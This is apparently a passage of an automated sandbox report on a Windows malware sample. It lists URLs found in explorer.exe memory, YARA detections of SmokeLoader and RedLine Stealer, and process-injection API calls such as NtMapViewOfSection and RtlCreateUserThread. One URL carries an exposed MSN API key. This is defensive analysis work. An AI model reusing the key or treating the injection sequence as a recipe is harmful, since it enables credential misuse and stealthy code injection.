Source: explorer.exe, 00000001.00000000.1780555667.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1775499027.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.000000000482E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1775499027.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 0000000B.00000002.2958316286.000000000482E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmv
Source: explorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1777648899.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.0000000008235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008246000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2680525283.0000000008278000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.000000000823B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000B.00000003.2670022683.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008317000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/D
Source: explorer.exe, 0000000B.00000003.2687754083.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.0000000008235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008246000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2680525283.0000000008278000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.000000000823B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/X
Source: explorer.exe, 00000001.00000000.1777648899.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000B.00000003.2687754083.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.0000000008235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008246000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2680525283.0000000008278000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.000000000823B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1777648899.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777648899.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000B.00000002.2961877649.0000000004AE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?V
Source: explorer.exe, 00000001.00000000.1777648899.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 0000000B.00000003.2687754083.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.0000000008235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008246000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2680525283.0000000008278000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.000000000823B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comv
Source: explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 0000000B.00000003.2670022683.00000000083C2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.00000000083C2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.00000000083C2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.00000000083C2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2681492107.00000000083D5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.00000000083C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com30#
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 0000000B.00000003.2677069781.000000000842C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.00000000083F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comEM
Source: explorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1780555667.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1792409837.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2055477127.00000000047B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1792142730.0000000002CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1792278239.0000000002CDC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1792409837.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2055364518.0000000004770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1792124239.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.2055477127.00000000047B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1792142730.0000000002CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2055184698.0000000002C5D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401514
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F97
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401542
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,	0_2_00403247
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401549
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,	0_2_0040324F
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,	0_2_00403256
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401557
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,	0_2_0040326C
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,	0_2_00403277
